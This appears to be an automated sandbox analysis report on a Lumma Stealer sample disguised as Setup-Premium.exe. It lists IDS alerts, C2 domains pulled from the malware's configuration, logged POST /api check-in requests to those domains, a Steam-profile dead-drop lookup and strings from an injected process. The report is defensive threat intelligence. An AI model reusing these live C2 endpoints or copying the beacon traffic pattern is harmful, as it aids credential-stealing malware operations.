Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49744 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49724 -> 172.67.173.224:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49724 -> 172.67.173.224:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49751 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49751 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49757 -> 104.21.53.8:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49757 -> 104.21.53.8:443
                  Source: Malware configuration extractorURLs: vennurviot.sbs
                  Source: Malware configuration extractorURLs: condifendteu.sbs
                  Source: Malware configuration extractorURLs: mathcucom.sbs
                  Source: Malware configuration extractorURLs: enlargkiw.sbs
                  Source: Malware configuration extractorURLs: proclaimykn.buzz
                  Source: Malware configuration extractorURLs: resinedyw.sbs
                  Source: Malware configuration extractorURLs: ehticsprocw.sbs
                  Source: Malware configuration extractorURLs: drawwyobstacw.sbs
                  Source: Malware configuration extractorURLs: allocatinow.sbs
                  Source: Joe Sandbox View | IP Address: 104.21.53.8
                  Source: Joe Sandbox View | IP Address: 188.114.96.3
                  Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: proclaimykn.buzz
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mathcucom.sbs
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: enlargkiw.sbs
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: resinedyw.sbs
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: vennurviot.sbs
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: ehticsprocw.sbs
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: condifendteu.sbs
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: drawwyobstacw.sbs
                  Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sergei-esenin.com
                  Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Cookie: __cf_mw_byp=7dVCApaVSuJAHxS2hly8AvsgLmmtzBWUGr_DufxF.Bw-1728776664-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 75 | Host: sergei-esenin.com
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: proclaimykn.buzz
                  Source: global traffic | DNS traffic detected: DNS query: mathcucom.sbs
                  Source: global traffic | DNS traffic detected: DNS query: allocatinow.sbs
                  Source: global traffic | DNS traffic detected: DNS query: enlargkiw.sbs
                  Source: global traffic | DNS traffic detected: DNS query: resinedyw.sbs
                  Source: global traffic | DNS traffic detected: DNS query: vennurviot.sbs
                  Source: global traffic | DNS traffic detected: DNS query: ehticsprocw.sbs
                  Source: global traffic | DNS traffic detected: DNS query: condifendteu.sbs
                  Source: global traffic | DNS traffic detected: DNS query: drawwyobstacw.sbs
                  Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                  Source: global traffic | DNS traffic detected: DNS query: sergei-esenin.com
                  Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: proclaimykn.buzz
                  Source: Setup-Premium.exe | String found in binary or memory: http://.css
                  Source: Setup-Premium.exe | String found in binary or memory: http://.jpg
                  Source: Setup-Premium.exe | String found in binary or memory: http://html4/loose.dtd
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/definitions/positiveInteger
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/definitions/positiveIntegerDefault0
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/definitions/stringArray
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/default
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/description
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/enum
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/exclusiveMaximum
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/exclusiveMinimum
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/maximum
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/minimum
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/multipleOf
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/pattern
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/title
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/type
                  Source: Setup-Premium.exe | String found in binary or memory: http://json-schema.org/draft-04/schema#/properties/uniqueItems
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: Setup-Premium.exe | String found in binary or memory: http://swagger.io/v2/schema.json#
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://condifendteu.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drawwyobstacw.sbs/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drawwyobstacw.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drawwyobstacw.sbs/ht
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ehticsprocw.sbs/
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ehticsprocw.sbs/M
                  Source: BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ehticsprocw.sbs/api
                  Source: Setup-Premium.exe | String found in binary or memory: https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml.
                  Source: Setup-Premium.exe | String found in binary or memory: https://gorm.io/docs/hooks.htmlWarning:
                  Source: BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
                  Source: Setup-Premium.exe | String found in binary or memory: https://index.docker.io/v1/input
                  Source: BitLockerToGo.exe, 00000002.00000003.2183297651.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2193093217.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mathcucom.sbs/
                  Source: BitLockerToGo.exe, 00000002.00000003.2183297651.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2193093217.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mathcucom.sbs/api
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/%
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/-
                  Source: BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/api
                  Source: BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apiM
                  Source: BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
